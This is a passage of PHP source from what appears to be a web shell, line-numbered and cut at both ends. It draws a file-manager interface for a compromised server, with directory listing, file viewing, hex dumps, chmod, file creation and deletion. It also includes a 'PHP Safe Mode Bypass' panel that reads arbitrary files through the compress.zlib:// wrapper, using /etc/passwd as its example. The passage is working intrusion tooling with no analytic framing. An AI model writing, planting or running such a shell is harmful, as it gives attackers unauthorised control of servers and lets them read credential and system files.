3623
3624 $row[] = "<b>Modify</b>";
3625
3626 if (!$win)
3627
3628 {$row[] = "<b>Owner/Group</b>";}
3629
3630 $row[] = "<b>Perms</b>";
3631
3632 $row[] = "<b>Action</b>";
3633
3634 $parsesort = parsesort($sort);
3635
3636 $sort = $parsesort[0].$parsesort[1];
3637
3638 $k = $parsesort[0];
3639
3640 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
3641
3642 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
3643
3644 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
3645
3646 $row[$k] .= $y;
3647
3648 for($i=0;$i<count($row)-1;$i++)
3649
3650 {
3651
3652 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
3653
3654 }
3655
3656 $v = $parsesort[0];
3657
3658 usort($objects["folders"], "tabsort");
3659
3660 usort($objects["links"], "tabsort");
3661
3662 usort($objects["files"], "tabsort");
3663
3664 if ($parsesort[1] == "d")
3665
3666 {
3667
3668 $objects["folders"] = array_reverse($objects["folders"]);
3669
3670 $objects["files"] = array_reverse($objects["files"]);
3671
3672 }
3673
3674 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
3675
3676 $tab = array();
3677
3678 $tab["cols"] = array($row);
3679
3680 $tab["head"] = array();
3681
3682 $tab["folders"] = array();
3683
3684 $tab["links"] = array();
3685
3686 $tab["files"] = array();
3687
3688 $i = 0;
3689
3690 foreach ($objects as $a)
3691
3692 {
3693
3694 $v = $a[0];
3695
3696 $o = basename($v);
3697
3698 $dir = dirname($v);
3699
3700 if ($disp_fullpath) {$disppath = $v;}
3701
3702 else {$disppath = $o;}
3703
3704 $disppath = str2mini($disppath,60);
3705
3706 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
3707
3708 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
3709
3710 foreach ($regxp_highlight as $r)
3711
3712 {
3713
3714 if (ereg($r[0],$o))
3715
3716 {
3717
3718 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();}
3719
3720 else
3721
3722 {
3723
3724 $r[1] = round($r[1]);
3725
3726 $isdir = is_dir($v);
3727
3728 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
3729
3730 {
3731
3732 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
3733
3734 $disppath = $r[2].$disppath.$r[3];
3735
3736 if ($r[4]) {break;}
3737
3738 }
3739
3740 }
3741
3742 }
3743
3744 }
3745
3746 $uo = urlencode($o);
3747
3748 $ud = urlencode($dir);
3749
3750 $uv = urlencode($v);
3751
3752 $row = array();
3753
3754 if ($o == ".")
3755
3756 {
3757
3758 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
3759
3760 $row[] = "LINK";
3761
3762 }
3763
3764 elseif ($o == "..")
3765
3766 {
3767
3768 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
3769
3770 $row[] = "LINK";
3771
3772 }
3773
3774 elseif (is_dir($v))
3775
3776 {
3777
3778 if (is_link($v))
3779
3780 {
3781
3782 $disppath .= " => ".readlink($v);
3783
3784 $type = "LINK";
3785
3786 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
3787
3788 }
3789
3790 else
3791
3792 {
3793
3794 $type = "DIR";
3795
3796 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
3797
3798 }
3799
3800 $row[] = $type;
3801
3802 }
3803
3804 elseif(is_file($v))
3805
3806 {
3807
3808 $ext = explode(".",$o);
3809
3810 $c = count($ext)-1;
3811
3812 $ext = $ext[$c];
3813
3814 $ext = strtolower($ext);
3815
3816 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
3817
3818 $row[] = view_size($a[1]);
3819
3820 }
3821
3822 $row[] = date("d.m.Y H:i:s",$a[2]);
3823
3824 if (!$win) {$row[] = $a[3];}
3825
3826 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
3827
3828 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
3829
3830 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
3831
3832 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
3833
3834 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
3835
3836 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
3837
3838 elseif (is_link($v)) {$tab["links"][] = $row;}
3839
3840 elseif (is_dir($v)) {$tab["folders"][] = $row;}
3841
3842 elseif (is_file($v)) {$tab["files"][] = $row;}
3843
3844 $i++;
3845
3846 }
3847
3848 }
3849
3850 // Compiling table
3851
3852 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
3853
3854 echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
3855
3856 foreach($table as $row)
3857
3858 {
3859
3860 echo "<tr>\r\n";
3861
3862 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
3863
3864 echo "</tr>\r\n";
3865
3866 }
3867
3868 echo "</table><br><hr size=\"1\" noshade><p align=\"right\">
3869
3870 <script>
3871
3872 function ls_setcheckboxall(status)
3873
3874 {
3875
3876 var id = 1;
3877
3878 var num = ".(count($table)-2).";
3879
3880 while (id <= num)
3881
3882 {
3883
3884 document.getElementById('actbox'+id).checked = status;
3885
3886 id++;
3887
3888 }
3889
3890 }
3891
3892 function ls_reverse_all()
3893
3894 {
3895
3896 var id = 1;
3897
3898 var num = ".(count($table)-2).";
3899
3900 while (id <= num)
3901
3902 {
3903
3904 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
3905
3906 id++;
3907
3908 }
3909
3910 }
3911
3912 </script>
3913
3914 <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
3915
3916 <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
3917
3918 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
3919
3920 {
3921
3922 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
3923
3924 }
3925
3926 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
3927
3928 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
3929
3930 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
3931
3932 if ($usefsbuff)
3933
3934 {
3935
3936 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
3937
3938 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
3939
3940 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
3941
3942 }
3943
3944 echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
3945
3946 echo "</form><hr size=\"1\" noshade>";
3947 }
3948 ?>
3949<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>
3950 <tr> <!-- 1 -->
3951 <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>
3952 <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>
3953 <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>
3954 </tr>
3955 <tr><!-- 3 -->
3956 <td valign="top">
3957
3958 <center><b>(: List Directories :)</b> <form action="<?php echo $surl; ?>">
3959
3960 <div align="center"><br>
3961
3962 Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>
3963<?php
3964
3965
3966
3967 function rsg_glob()
3968
3969{
3970
3971$chemin=$_GET['directory'];
3972
3973$files = glob("$chemin*");
3974
3975echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
3976
3977foreach ($files as $filename) {
3978
3979 echo "<pre>";
3980
3981 echo "$filename\n";
3982
3983 echo "</pre>";
3984
3985}
3986
3987}
3988
3989
3990
3991if(isset($_GET['directory']))
3992
3993{
3994
3995rsg_glob();
3996
3997}
3998
3999
4000
4001?>
4002
4003
4004 </form></center>
4005
4006 </td>
4007 <td>
4008 <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
4009 </td>
4010 <td>
4011 <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
4012 </td>
4013 </tr>
4014 <tr><!-- 2 -->
4015 <td valign="top">
4016
4017 <div align="center"><b>(: Read Files :)</b></div><br>
4018
4019 <form action="<?php echo $surl; ?>">
4020
4021 <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
4022 <?php
4023
4024 function rsg_read()
4025
4026 {
4027
4028 $test="";
4029
4030 $temp=tempnam($test, "cx");
4031
4032 $file=$_GET['file'];
4033
4034 $get=htmlspecialchars($file);
4035
4036 echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
4037
4038 if(copy("compress.zlib://".$file, $temp)){
4039
4040 $fichier = fopen($temp, "r");
4041
4042 $action = fread($fichier, filesize($temp));
4043
4044 fclose($fichier);
4045
4046 $source=htmlspecialchars($action);
4047
4048 echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
4049
4050 unlink($temp);
4051
4052 } else {
4053
4054 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
4055
4056 <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
4057
4058 access.</CENTER></FONT>");
4059
4060 }
4061
4062 echo "</div>";
4063
4064 }
4065
4066
4067
4068 if(isset($_GET['file']))
4069
4070{
4071
4072rsg_read();
4073
4074}
4075
4076
4077
4078 ?>
4079
4080
4081 <br>
4082
4083 </div>
4084
4085 </form>
4086
4087 </td>
4088 <td >
4089 <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
4090 </td>
4091 <td>
4092 <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
4093 </td>
4094
4095 </tr>
4096
4097 </table> <?php
4098 }
4099
4100
4101if ($act == "delete")
4102
4103{
4104
4105 $delerr = "";
4106
4107 foreach ($actbox as $v)
4108
4109 {
4110
4111 $result = FALSE;
4112
4113 $result = fs_rmobj($v);
4114
4115 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
4116
4117 }
4118
4119 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
4120
4121 $act = "ls";
4122
4123}
4124
4125if ($act == "chmod")
4126
4127{
4128
4129 $mode = fileperms($d.$f);
4130
4131 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
4132
4133 else
4134
4135 {
4136
4137 $form = TRUE;
4138
4139 if ($chmod_submit)
4140
4141 {
4142
4143 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
4144
4145 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
4146
4147 else {$err = "Can't chmod to ".$octet.".";}
4148
4149 }
4150
4151 if ($form)
4152
4153 {
4154
4155 $perms = parse_perms($mode);
4156
4157 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
4158
4159 }
4160
4161 }
4162
4163}
4164
4165if ($act == "search")
4166
4167{
4168
4169 echo "<b>Search in file-system:</b><br>";
4170
4171 if (empty($search_in)) {$search_in = $d;}
4172
4173 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
4174
4175 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
4176
4177 if (!empty($submit))
4178
4179 {
4180
4181 $found = array();
4182
4183 $found_d = 0;
4184
4185 $found_f = 0;
4186
4187 $search_i_f = 0;
4188
4189 $search_i_d = 0;
4190
4191 $a = array
4192
4193 (
4194
4195 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
4196
4197 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
4198
4199 "text_wwo"=>$search_text_wwo,
4200
4201 "text_cs"=>$search_text_cs,
4202
4203 "text_not"=>$search_text_not
4204
4205 );
4206
4207 $searchtime = getmicrotime();
4208
4209 $in = array_unique(explode(";",$search_in));
4210
4211 foreach($in as $v) {cyb3rfsearch($v);}
4212
4213 $searchtime = round(getmicrotime()-$searchtime,4);
4214
4215 if (count($found) == 0) {echo "<b>No files found!</b>";}
4216
4217 else
4218
4219 {
4220
4221 $ls_arr = $found;
4222
4223 $disp_fullpath = TRUE;
4224
4225 $act = "ls";
4226
4227 }
4228
4229 }
4230
4231 echo "<form method=POST>
4232
4233<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
4234
4235<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
4236
4237<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
4238
4239<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
4240
4241<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
4242
4243&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
4244
4245&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
4246
4247&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
4248
4249<br><br><input type=submit name=submit value=\"Search\"></form>";
4250
4251 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
4252
4253}
4254
4255if ($act == "fsbuff")
4256
4257{
4258
4259 $arr_copy = $sess_data["copy"];
4260
4261 $arr_cut = $sess_data["cut"];
4262
4263 $arr = array_merge($arr_copy,$arr_cut);
4264
4265 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
4266
4267 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
4268
4269}
4270
4271if ($act == "d")
4272
4273{
4274
4275 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
4276
4277 else
4278
4279 {
4280
4281 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
4282
4283 if (!$win)
4284
4285 {
4286
4287 echo "<tr><td><b>Owner/Group</b></td><td> ";
4288
4289 $ow = posix_getpwuid(fileowner($d));
4290
4291 $gr = posix_getgrgid(filegroup($d));
4292
4293 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
4294
4295 }
4296
4297 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
4298
4299 }
4300
4301}
4302
4303if ($act == "chmod")
4304
4305{
4306
4307 $mode = fileperms($d.$f);
4308
4309 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
4310
4311 else
4312
4313 {
4314
4315 $form = TRUE;
4316
4317 if ($chmod_submit)
4318
4319 {
4320
4321 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
4322
4323 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
4324
4325 else {$err = "Can't chmod to ".$octet.".";}
4326
4327 }
4328
4329 if ($form)
4330
4331 {
4332
4333 $perms = parse_perms($mode);
4334
4335 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
4336
4337 }
4338
4339 }
4340
4341}
4342
4343if ($act == "f")
4344
4345{
4346
4347 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
4348
4349 {
4350
4351 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
4352
4353 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
4354
4355 }
4356
4357 else
4358
4359 {
4360
4361 $r = @file_get_contents($d.$f);
4362
4363 $ext = explode(".",$f);
4364
4365 $c = count($ext)-1;
4366
4367 $ext = $ext[$c];
4368
4369 $ext = strtolower($ext);
4370
4371 $rft = "";
4372
4373 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
4374
4375 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
4376
4377 if (empty($ft)) {$ft = $rft;}
4378
4379 $arr = array(
4380
4381 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
4382
4383 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
4384
4385 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
4386
4387 array("Code","code"),
4388
4389 array("Session","phpsess"),
4390
4391 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
4392
4393 array("SDB","sdb"),
4394
4395 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
4396
4397 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
4398
4399 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
4400
4401 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
4402
4403 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
4404
4405 );
4406
4407 echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
4408
4409 foreach($arr as $t)
4410
4411 {
4412
4413 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
4414
4415 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
4416
4417 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
4418
4419 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
4420
4421 }
4422
4423 echo "<hr size=\"1\" noshade>";
4424
4425 if ($ft == "info")
4426
4427 {
4428
4429 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
4430
4431 if (!$win)
4432
4433 {
4434
4435 echo "<tr><td><b>Owner/Group</b></td><td> ";
4436
4437 $ow = posix_getpwuid(fileowner($d.$f));
4438
4439 $gr = posix_getgrgid(filegroup($d.$f));
4440
4441 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
4442
4443 }
4444
4445 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
4446
4447 $fi = fopen($d.$f,"rb");
4448
4449 if ($fi)
4450
4451 {
4452
4453 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
4454
4455 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
4456
4457 $n = 0;
4458
4459 $a0 = "00000000<br>";
4460
4461 $a1 = "";
4462
4463 $a2 = "";
4464
4465 for ($i=0; $i<strlen($str); $i++)
4466
4467 {
4468
4469 $a1 .= sprintf("%02X",ord($str[$i]))." ";
4470
4471 switch (ord($str[$i]))
4472
4473 {
4474
4475 case 0: $a2 .= "<font>0</font>"; break;
4476
4477 case 32:
4478
4479 case 10:
4480
4481 case 13: $a2 .= "&nbsp;"; break;
4482
4483 default: $a2 .= htmlspecialchars($str[$i]);
4484
4485 }
4486
4487 $n++;
4488
4489 if ($n == $hexdump_rows)
4490
4491 {
4492
4493 $n = 0;
4494
4495 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
4496
4497 $a1 .= "<br>";
4498
4499 $a2 .= "<br>";
4500
4501 }
4502
4503 }
4504
4505 //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
4506
4507 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
4508
4509 }
4510
4511 $encoded = "";
4512
4513 if ($base64 == 1)
4514
4515 {
4516
4517 echo "<b>Base64 Encode</b><br>";
4518
4519 $encoded = base64_encode(file_get_contents($d.$f));
4520
4521 }
4522
4523 elseif($base64 == 2)
4524
4525 {
4526
4527 echo "<b>Base64 Encode + Chunk</b><br>";
4528
4529 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
4530
4531 }
4532
4533 elseif($base64 == 3)
4534
4535 {
4536
4537 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
4538
4539 $encoded = base64_encode(file_get_contents($d.$f));
4540
